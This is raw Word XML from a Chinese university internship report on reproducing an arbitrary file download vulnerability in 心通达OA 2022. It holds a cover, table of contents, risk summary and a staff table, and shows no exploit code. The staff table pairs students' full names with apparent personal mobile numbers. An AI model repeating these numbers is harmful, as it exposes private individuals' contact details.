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F654" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DEDB81A" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="43BC9124" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="3418E7CC" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A814F28" w14:textId="77777777" w:rsidR="00DB0454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南开大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC68767" w14:textId="77777777" w:rsidR="00DB0454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实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445340A" w14:textId="77777777" w:rsidR="00DB0454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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEA3142" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7091B5" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6592B9B3" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EAE5EA" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76830C55" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7D2047" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074BFFF7" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A754BD" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="736A9E5D" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4A4F78" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D787D6" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C82DD08" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53664FE6" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="17141C26" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="79889F5D" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0956B085" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DBE8A00" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C0F7DD" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F1DFA2" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="641D178D" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="4B1D63EC" w14:textId="244DEDD8" w:rsidR="00DB0454" w:rsidRDefault="00000000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022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="00E1719F">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418F3D8F" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr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/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="2F397536" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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4A525F6D" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="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cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc28487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漏洞复现结论（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_Toc28487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523A506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481" w:history="1">
            <w:r>
              <w:t>1.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级分布</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7481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37EBB82" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc24528" w:history="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工作计划（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_Toc24528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FEC4C62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3939" w:history="1">
            <w:r>
              <w:t>2.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作人员</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc13939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73B237E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137" w:history="1">
            <w:r>
              <w:t>2.2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞对象</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3137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2CD7515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909" w:history="1">
            <w:r>
              <w:t>2.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现阶段</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc7909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F119E70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60" w:history="1"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风险等级</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc1860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1F81989" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc6133" w:history="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漏洞复现过程（</w:t>
            </w:r>
            <w:r>
              <w:t>3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_Toc6133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5F87783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532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风险管理及规避</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18532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80D8ECB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4033" w:history="1"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>测试方法</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc4033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B2BD00C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8445" w:history="1"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>测试中所用的工具</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28445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AD92F14" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12892" w:history="1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漏洞复现结果（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_Toc12892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8F0007D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2666" w:history="1">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件编写</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc32666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A4F764D" w14:textId="77777777" w:rsidR="00DB045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5120" w:history="1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漏洞信息</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc25120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57A5F55" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="52A8275B" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17FAA1FB" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="0524DE72" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr w:rsidR="00DB0454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2768118" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结论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"/>
    </w:p>
    <w:p w14:paraId="47437313" w14:textId="61922D69" w:rsidR="00DB0454" w:rsidRDefault="002D23FC">
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>组的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体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/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>022</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体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/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对心通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A27566" w14:textId="09CC1A3F" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r w:rsidR="002D23FC">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋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个，其高危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="002D23FC">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋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个，中危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="002D23FC">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>低危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="002D23FC">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个。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4584"/>
        <w:gridCol w:w="2156"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0454" w14:paraId="3CFC25A0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="507E8732" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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bookmarkStart w:id="3" w:name="_Hlk482954515"/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 w14:paraId="21156B66" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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 w14:paraId="4DC5EC04" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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风险值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="21119154" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="713"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="303C529A" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1539B1DE" w14:textId="5E5E82EE" w:rsidR="00DB0454" w:rsidRDefault="00EF3D8A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心通达</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OA2022</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>初夏版任意文件下载漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="616955E8" w14:textId="446DAA5F" w:rsidR="00DB0454" w:rsidRDefault="00EF3D8A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</w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="4FCEFEAC" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A011A82" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5762C2A5" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454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2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="02D2107B" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:widowControl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</w:tr>
      <w:tr w:rsidR="00DB0454" w14:paraId="4EB3FC3A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="530CEAF8" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000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4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="319F1ECF" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454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2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="406DC88F" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454">
            <w:pPr>
              <w:widowControl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</w:tr>
    </w:tbl>
    <w:p w14:paraId="69E01496" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc16656"/>
      <w:bookmarkStart w:id="5" w:name="_Toc5011"/>
      <w:bookmarkStart w:id="6" w:name="_Toc7481"/>
      <w:bookmarkEnd w:id="3"/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54829E53" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次评估漏洞的详细风险等级分布如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200BC35" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00DB0454"/>
    <w:p w14:paraId="6140FFDD" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc32430"/>
      <w:bookmarkStart w:id="8" w:name="_Toc8277"/>
      <w:bookmarkStart w:id="9" w:name="_Toc24528"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作计划</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8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9"/>
    </w:p>
    <w:p w14:paraId="15A4AD7C" w14:textId="77777777" w:rsidR="00DB0454" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc21093"/>
      <w:bookmarkStart w:id="11" w:name="_Toc10156"/>
      <w:bookmarkStart w:id="12" w:name="_Toc13939"/>
      <w:r>
        <w:t>2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作人员</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1974" w:tblpY="256"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8170" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="802"/>
        <w:gridCol w:w="1722"/>
        <w:gridCol w:w="1138"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB0454" w14:paraId="224919B6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="697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A02C9C" w14:textId="77777777" w:rsidR="00DB0454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0DC5036" w14:textId="77777777" w:rsidR="00DB0454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EFE04E7" w14:textId="77777777" w:rsidR="00DB0454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0EF13A" w14:textId="77777777" w:rsidR="00DB0454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 w:rsidR="000E0920" w14:paraId="7B8A7977" w14:textId="77777777" w:rsidTr="00E54E84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6C1436" w14:textId="77777777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72504530" w14:textId="7FAD6FCC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组长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0C7B4005" w14:textId="76E6526D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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006376D2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>袁铭泽</w:t>
            </w:r>
            <w:r w:rsidRPr="006376D2"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6F53C3C6" w14:textId="61C9D492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13082490753</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0920" w14:paraId="4D069B7E" w14:textId="77777777" w:rsidTr="00E54E84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A62B1DC" w14:textId="77777777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074E007E" w14:textId="3BA6DABF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5675A4C2" w14:textId="3E5260FD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许健</w:t>
            </w:r>
            <w:r w:rsidRPr="006376D2"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7A3E8F26" w14:textId="16ECD8F5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18356357915</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0920" w14:paraId="4C50FEBD" w14:textId="77777777" w:rsidTr="00E54E84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187FFD3" w14:textId="77777777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296E0D55" w14:textId="0B22B21F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7E023AE2" w14:textId="2D967030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杜一凡</w:t>
            </w:r>
            <w:r w:rsidRPr="006376D2"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3699FB78" w14:textId="174BE268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17744403620</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0920" w14:paraId="37B4B6E1" w14:textId="77777777" w:rsidTr="00E54E84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A4971D3" w14:textId="77777777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4EA08B56" w14:textId="4D1815D8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000E3A5D" w14:textId="6B61150D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吕昆娴</w:t>
            </w:r>
            <w:r w:rsidRPr="006376D2"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3CE1A647" w14:textId="55397A7C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15943548836</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0920" w14:paraId="1F162A0F" w14:textId="77777777" w:rsidTr="00E54E84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AD8A8FC" w14:textId="77777777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54D79DD1" w14:textId="300ADD5B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6ECE45B2" w14:textId="39B3BD7A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运开</w:t>
            </w:r>
